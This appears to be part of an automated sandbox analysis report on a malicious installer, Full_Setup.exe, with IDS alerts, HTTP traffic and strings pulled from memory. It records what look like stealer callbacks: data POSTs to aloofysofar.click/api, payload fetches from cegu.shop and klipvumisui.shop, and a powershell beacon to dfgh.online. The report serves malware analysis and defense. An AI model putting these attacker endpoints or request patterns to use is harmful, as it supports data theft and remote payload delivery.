Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49756 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49755 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.37.128:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49758 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 172.67.196.191:443
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49759

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TOU8M2Q9GKMUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18126Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9WXPW0MEMNZKXTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6NKQELCCNNAYVGL29PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20436Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6VTO90GNZ34MUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5447Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HWGS6YACVX1RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 943Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QBDYKSV9X38VZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568916Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: aloofysofar.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: global traffic	DNS traffic detected: DNS query: aloofysofar.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aloofysofar.click

Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Full_Setup.exe	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
Source: 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
Source: Full_Setup.exe	String found in binary or memory: http://crl.starfieldtech.com/repository/0
Source: Full_Setup.exe	String found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
Source: Full_Setup.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertr
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/Sectig
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: powershell.exe, 00000004.00000002.1962949630.0000000005280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: BrightLib.exe, 00000024.00000002.2527811100.0000000003290000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000000.2482093458.0000000000AEE000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2528585375.000000000623B000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2527752951.0000000003287000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://michaeluno.jp/
Source: BrightLib.exe, 00000024.00000002.2527811100.0000000003290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://michaeluno.jp/4
Source: powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.securetrust.com/0?
Source: Full_Setup.exe	String found in binary or memory: http://ocsp.starfieldtech.com/0D
Source: Full_Setup.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.trustwave.com/06
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.vikingcloud.com/0:
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.vikingcloud.com/0A
Source: powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Full_Setup.exe	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Full_Setup.exe	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1962949630.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Full_Setup.exe	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Full_Setup.exe	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Full_Setup.exe	String found in binary or memory: http://sf.symcd.com0&
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ssl.trustwave.com/issuers/TWGCA.crt0
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: Full_Setup.exe	String found in binary or memory: http://sv.symcb.com/sv.crl0W
Source: Full_Setup.exe	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Full_Setup.exe	String found in binary or memory: http://sv.symcd.com0&
Source: Full_Setup.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Full_Setup.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Full_Setup.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BrightLib.exe, 00000024.00000002.2526451189.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000000.2482040175.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.autohotkey.com
Source: BrightLib.exe, 00000024.00000002.2526451189.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000000.2482040175.000000000049A000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://www.autohotkey.comCould
Source: 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2039095023.0000000003490000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000007.00000003.2045398276.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 8R65FTCZQK06W5IFC.tmp, 00000009.00000003.2552644461.00000000029E0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.9.dr, _isdecmp.dll.7.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: BrightLib.exe, 00000024.00000002.2549688545.0000000039F54000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: Full_Setup.exe	String found in binary or memory: http://www.innosetup.com/
Source: Full_Setup.exe	String found in binary or memory: http://www.remobjects.com/ps
Source: Full_Setup.exe	String found in binary or memory: http://www.symauth.com/cps0(
Source: Full_Setup.exe	String found in binary or memory: http://www.symauth.com/rpa00
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Full_Setup.exe, 00000000.00000003.1819479786.00000000036AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000004.00000002.1962949630.0000000004E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.1962949630.00000000050B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945479018.000000000367F000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1876767831.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1897734559.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1876562822.0000000003685000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1831491563.0000000003686000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1876933539.0000000000916000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1804371471.000000000367A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aloofysofar.click/
Source: Full_Setup.exe, 00000000.00000003.1831906551.0000000003687000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1831536852.0000000003686000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aloofysofar.click/$$
Source: Full_Setup.exe, 00000000.00000003.1876767831.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1887634510.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1897734559.0000000000907000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aloofysofar.click/api
Source: Full_Setup.exe, 00000000.00000003.1897734559.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aloofysofar.click/h
Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1897734559.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aloofysofar.click:443/api
Source: Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1897734559.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aloofysofar.click:443/apiA
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Full_Setup.exe, Full_Setup.exe, 00000000.00000003.2016571437.000000000367E000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1945479018.000000000367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: Full_Setup.exe	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
Source: Full_Setup.exe, 00000000.00000003.1945693510.0000000000901000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000002.2018287824.000000000090D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txtc
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://certs.securetrust.com/CA0
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2016523316.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://certs.securetrust.com/CA05
Source: Full_Setup.exe, 00000000.00000003.2015508311.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.2004747206.0000000003683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://certs.securetrust.com/CA0:
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1971200584.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Full_Setup.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: Full_Setup.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online
Source: powershell.exe, 00000004.00000002.1961151737.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: powershell.exe, 00000004.00000002.1962949630.0000000004FD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Full_Setup.exe, 00000000.00000003.1792452189.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, Full_Setup.exe, 00000000.00000003.1792210721.00000000036BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
